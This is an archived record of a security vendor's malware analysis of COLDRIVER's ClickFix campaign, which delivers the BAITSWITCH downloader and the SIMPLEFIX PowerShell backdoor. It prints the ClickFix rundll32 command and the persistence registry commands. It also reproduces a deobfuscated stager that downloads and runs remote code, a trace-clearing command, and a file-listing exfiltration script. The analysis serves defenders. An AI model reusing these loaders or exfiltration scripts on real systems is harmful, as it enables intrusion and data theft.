{
	"id": "5fc78e25-3a1a-4dd6-939d-780414320679",
	"created_at": "2026-04-06T00:11:47.235623Z",
	"updated_at": "2026-04-10T03:34:43.767096Z",
	"deleted_at": null,
	"sha1_hash": "3d980b6df91d2d6b6f909111f07c0f5bba05c9b6",
	"title": "COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 531282,
	"plain_text": "COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz\r\nBy Sudeep Singh, Yin Hong Chang\r\nPublished: 2025-09-24 · Archived: 2026-04-05 21:12:47 UTC\r\nTechnical Analysis\r\nIn this section, a detailed analysis is provided for each component of the attack chain initiated when a victim visits a ClickFix webpage and performs the actions prompted by the site. The figure below provides an overview of the multi-stage attack chain.\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 1 of 9\r\nFigure 1: Multi-stage end-to-end ClickFix campaign attack chain leveraging BAITSWITCH to deliver SIMPLEFIX.\r\nClickFix / CAPTCHA verification\r\nThe infection chain begins with a webpage masquerading as an information resource addressing challenges faced by members of civil society and think tanks in Russia. This webpage employs the ClickFix social-engineering attack method to trick users into executing a malicious command in the Windows Run dialog box by displaying a fake Cloudflare Turnstile checkbox, as shown in the figure below.\r\nFigure 2: Fake Cloudflare Turnstile checkbox.\r\nWhen the user clicks the checkbox, the embedded JavaScript code copies a malicious command (rundll32.exe \\\\captchanom.top\\check\\machinerie.dll,verifyme) to the user’s clipboard. Next, the page displays UI elements designed to prompt the user to paste and execute this command in the Windows Run dialog box. This action executes machinerie.dll (BAITSWITCH) via rundll32.exe, invoking its verifyme export function. While this UI is displayed, the JavaScript code waits for a set timeout before redirecting the victim to a decoy document hosted on Google Drive, created by the threat-actor controlled account narnobudaeva@gmail[.]com. The figure below shows the contents of this decoy document.\r\nFigure 3: Example of a ClickFix social-engineering decoy document hosted on Google Drive.\r\nThis two-page decoy document describes efforts to build resilience for exiled members of Russian civil society, such as human rights defenders, journalists, educators, and civic activists, through mentorship and fellowship programs.\r\nBAITSWITCH downloader DLL\r\nBAITSWITCH (Machinerie.dll) is a downloader that establishes persistence and retrieves stager payloads to execute the SIMPLEFIX backdoor. It connects to URLs using a hardcoded user-agent string (Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edge/133.0.0.0) to receive and execute commands. The command-and-control (C2) server responds with commands only when this specific user-agent string is used, returning a “404 Not Found” page otherwise.\r\nBAITSWITCH makes five HTTP requests to the threat-actor controlled domain captchanom[.]top to receive various commands and download the PowerShell-based SIMPLEFIX backdoor. For each response from the C2 server, BAITSWITCH uses the lpCommandLine parameter of CreateProcessA to execute the command on the endpoint. Below is the sequence of requests made:\r\n1. The first request to the URL hxxps://captchanom[.]top/coup/premier retrieves a command to establish persistence. This command executes the reg executable, configuring the UserInitMprLogonScript registry key to run a PowerShell script (downloaded later) with a specific argument at the next user logon. Below is the command received:\r\nreg add \"HKCU\\Environment\" /v UserInitMprLogonScript /t REG_SZ /d \"powershell -WindowStyle Hidden -ep bypass \\\"\r\n2. The second request to the URL hxxps://captchanom[.]top/coup/deuxieme retrieves a command to store encrypted payloads in the Windows registry. The received command executes PowerShell to add a Base64-encoded, AES-encrypted PowerShell script (stored in $ii) and a Base64-encoded AES decryption key (stored in $iii) to the Windows registry keys EnthusiastMod and QatItems, respectively. This encrypted script will be decrypted and executed in subsequent stages. Below is the command received:\r\npowershell -c \"$ii = 'kXvyDMF+...iL54E0QbEXJyRA==';$iii = 'yuClT3Iwhv9SERwcmKipg=';$rrr = 'HKCU:\\SOFTWARE\\Micro\r\n3. In the third request to the URL hxxps://captchanom[.]top/coup/troisieme, BAITSWITCH downloads a PowerShell stager from a different server (southprovesolutions[.]com/FvFLcsr23) and saves it to the path %APPDATA%\\Microsoft\\Windows\\FvFLcsr23.ps1, referenced earlier in the persistence setup. Below is the command received:\r\npowershell -c\"Invoke-WebRequest -Uri \\\"hxxps://southprovesolutions[.]com/FvFLcsr23\\\" -OutFile \\\"$Env:APPDATA\\M\r\n4. The fourth request to the URL hxxps://captchanom[.]top/coup/quatre retrieves a command to clear the RunMRU registry key. The RunMRU key stores the Most Recently Used (MRU) commands entered into the Run dialog (Win + R). Since the ClickFix attack begins with the user pasting the malicious command into \"Win + R,\" this action effectively erases any trace of the attack. Below is the command received:\r\nreg delete HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f\r\n5. In the fifth and final request to the URL hxxps://captchanom[.]top/, BAITSWITCH sends the victim’s hostname to the C2, possibly to register the victim with the C2 server. No response was observed from this URL.\r\nPowerShell stager\r\nOn the next Windows logon, the PowerShell stager executes with the command-line parameter 7eHgxjgbBs3gHdkgx9AsRC, as specified in the logon script registry key.\r\nThis script uses basic string obfuscation techniques:\r\nMultiple Base64-encoded strings are decoded, transformed, and concatenated to construct the decoded PowerShell script.\r\nAfter decoding, each Base64-encoded string undergoes the following transformations:\r\nReplace all newline characters with semicolon characters.\r\nDelete all non-ASCII characters ([^\\x20-\\x7E]).\r\nDelete all 2-byte hex-encoded characters ((?i)x[0-9A-Fa-f]{4}).\r\nBelow is the deobfuscated PowerShell-based stager.\r\nfunction WWW($value) {\r\n $scriptBlock = [scriptblock]::Create($value); \u0026 $scriptBlock\r\n};\r\nfunction WWWWW {\r\n param([string] $eeee, [string] $eeeee);\r\n try {\r\n $eee = [Convert]::FromBase64String($eeee);\r\n $eeeeee = $eee[0..15];\r\n $eeeeeee = $eee[16..($eee.Length - 1)];\r\n $e = [System.Security.Cryptography.Aes]::Create();\r\n $e.Key = [Convert]::FromBase64String($eeeee);\r\n $e.IV = $eeeeee;\r\n $ee = $e.CreateDecryptor();\r\n $eeeeeeee = $ee.TransformFinalBlock($eeeeeee, 0, $eeeeeee.Length);\r\n return [Text.Encoding]::UTF8.GetString($eeeeeeee);\r\n } finally {\r\n if ($e) {\r\n $e.Dispose()\r\n }\r\n }\r\n};\r\n$wwwwww = Get-ItemPropertyValue -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{53121F\r\n$wwwwwww = Get-ItemPropertyValue -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{53121\r\n$key = $global:wwww + [System.Text.Encoding]::UTF8.GetString($wwwwwww);\r\n$wwwwwwww = [System.Text.Encoding]::UTF8.GetString($wwwwww);\r\n$w = WWWWW $wwwwwwww $key;\r\nWWW -value $w;\r\nThe stager has the following functionality:\r\nReads the Base64-encoded and AES-encrypted PowerShell script from HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\\DefaultIcon\\EnthusiastMode.\r\nReads a string from HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\\DefaultIcon\\QatItems.\r\nConcatenates the command-line parameter and the string from the registry to form the full Base64-encoded AES key: 7eHgxjgbBs3gHdkgx9AsRCyuClT3Iwhv9SERwcmKipg=.\r\nThe PowerShell script is decrypted using the first 16 bytes of the Base64-decoded blob as the initialization vector (IV) and a 32-byte decryption key. Below is the resulting decrypted script.\r\n$ia = @(\"southprovesolutions.com\");\r\n$fff = $false;\r\nwhile (-not $fff) {\r\n foreach ($iii in $ia) {\r\n if ((Invoke-WebRequest -Uri \"https://$iii/\" -UseBasicParsing -Method Head -TimeoutSec 5 -ErrorAction Sile\r\n $wc=New-Object System.Net.WebClient;\r\n Invoke-Command -ScriptBlock ([scriptblock]::Create($wc.DownloadString(\"https://$iii/Zxdf\")));\r\n $fff = $true;\r\n break;\r\n }\r\n else {}\r\n };\r\n if (-not $fff) {\r\n Start-Sleep -Seconds 5;\r\n }\r\n};\r\nThis decrypted PowerShell script fetches the SIMPLEFIX backdoor from the URL hxxps://southprovesolutions[.]com/Zxdf.\r\nSIMPLEFIX backdoor\r\nSIMPLEFIX employs obfuscation techniques similar to those employed in the stager PowerShell script. The resulting deobfuscated script is available in the ThreatLabz GitHub repository.\r\nThe script enters a loop to execute the following steps every 3 minutes:\r\nGenerate a user-agent string by combining the computer name, username, and the machine’s UUID (retrieved using WMI). This user-agent string is used for all communications with the C2 server.\r\nSend a request to hxxps://southprovesolutions[.]com/KZouoRc and parse the response for commands to execute.\r\nAfter each command is successfully executed, an HTTP request is sent to hxxps://southprovesolutions[.]com/VUkXugsYgu, likely to notify the C2 server of the successful command execution.\r\nSIMPLEFIX supports the commands outlined in the table below:\r\nCommand 1: Retrieves a URL hosting a binary and a command-line parameter used to launch this binary. If a filename is included in the URL, the binary is dropped with the same filename in the %temp% path. If no filename is included in the URL, the hardcoded name AkdD2sS.exe is used instead.\r\nCommand 2: Retrieves a set of commands to be executed on the user's machine. At the time of analysis, the commands received were used to collect information about the system, network, and user. The output of these commands is sent in an HTTP POST request to hxxps://southprovesolutions[.]com/EPAWl.\r\nCommand 3: Executes a PowerShell script and sends the command output via an HTTP POST request to hxxps://southprovesolutions[.]com/EPAWl.\r\nTable 1: Commands supported by SIMPLEFIX.\r\nAt the time of analysis, the commands in the following table were received:\r\nID: 2\r\nCommand: whoami /all \u0026 ipconfig /all \u0026 systeminfo \u0026 net share \u0026 net session \u0026 ipconfig /displaydns \u0026 query session \u0026 net user \u0026 netstat -ano \u0026 arp -a\r\nDescription: Commands for reconnaissance, including gathering information about the user, network configuration, and system.\r\nCommand: whoami/all\r\nDescription: Collects information about the user.\r\nID: 3\r\nCommand:\r\n[string[]]$di = @('Documents','Downloads','Desktop','OneDrive');\r\n[string[]]$fi = @('.pdf','.doc','.xls','.txt', '.zip', '.rar', '.7z');\r\n$r = [Environment]::GetFolderPath('UserProfile');\r\n$tr = [System.Collections.Generic.List[string]]::new();\r\nfunction PD {\r\n param([string]$p);\r\n try {\r\n $md = $false;\r\n foreach ($i in $di) { if ($p -like \"*${i}*\") { $md = $true; break }};\r\n if (-not $md) { return};\r\n [System.IO.Directory]::EnumerateFiles($p) | ForEach-Object { foreach ($f in $fi) { if ($_ -like \"*${f}*\") { $ii = [System.IO.FileInfo]::new($_);$tr.Add(\"[File]$_ $($ii.Length) $($ii.LastWriteTime)`n\");break;}}};\r\n [System.IO.Directory]::EnumerateDirectories($p) | ForEach-Object { PD $_ }\r\n } catch [System.UnauthorizedAccessException] {} catch {}\r\n};\r\n[System.IO.Directory]::EnumerateDirectories($r) | ForEach-Object { PD $_ };\r\n$tr;\r\nDescription: PowerShell script that exfiltrates information about a hardcoded list of file types found in a pre-configured list of directories. The file types correspond to documents and archives that may be of interest for strategic intelligence collection. The list of directories and file extensions scanned is very similar to the LOSTKEYS VBScript-based malware used by COLDRIVER in January 2025.\r\nCommand: exit\r\nDescription: Terminates the SIMPLEFIX backdoor.\r\nTable 2: ThreatLabz observed these commands being sent to the SIMPLEFIX backdoor.\r\nSource: https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix"
	],
	"report_names": [
		"coldriver-updates-arsenal-baitswitch-and-simplefix"
	],
	"threat_actors": [
		{
			"id": "79bd28a6-dc10-419b-bee7-25511ae9d3d4",
			"created_at": "2023-01-06T13:46:38.581534Z",
			"updated_at": "2026-04-10T02:00:03.029872Z",
			"deleted_at": null,
			"main_name": "Callisto",
			"aliases": [
				"BlueCharlie",
				"Star Blizzard",
				"TAG-53",
				"Blue Callisto",
				"TA446",
				"IRON FRONTIER",
				"UNC4057",
				"COLDRIVER",
				"SEABORGIUM",
				"GOSSAMER BEAR"
			],
			"source_name": "MISPGALAXY:Callisto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3aedca2f-6f6c-4470-af26-a46097d3eab5",
			"created_at": "2024-11-01T02:00:52.689773Z",
			"updated_at": "2026-04-10T02:00:05.396502Z",
			"deleted_at": null,
			"main_name": "Star Blizzard",
			"aliases": [
				"Star Blizzard",
				"SEABORGIUM",
				"Callisto Group",
				"TA446",
				"COLDRIVER"
			],
			"source_name": "MITRE:Star Blizzard",
			"tools": [
				"Spica"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3a057a97-db21-4261-804b-4b071a03c124",
			"created_at": "2024-06-04T02:03:07.953282Z",
			"updated_at": "2026-04-10T02:00:03.813595Z",
			"deleted_at": null,
			"main_name": "IRON FRONTIER",
			"aliases": [
				"Blue Callisto",
				"BlueCharlie",
				"CALISTO",
				"COLDRIVER",
				"Callisto Group",
				"GOSSAMER BEAR",
				"SEABORGIUM",
				"Star Blizzard",
				"TA446"
			],
			"source_name": "Secureworks:IRON FRONTIER",
			"tools": [
				"Evilginx2",
				"Galileo RCS",
				"SPICA"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434307,
	"ts_updated_at": 1775792083,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3d980b6df91d2d6b6f909111f07c0f5bba05c9b6.pdf",
		"text": "https://archive.orkl.eu/3d980b6df91d2d6b6f909111f07c0f5bba05c9b6.txt",
		"img": "https://archive.orkl.eu/3d980b6df91d2d6b6f909111f07c0f5bba05c9b6.jpg"
	}
}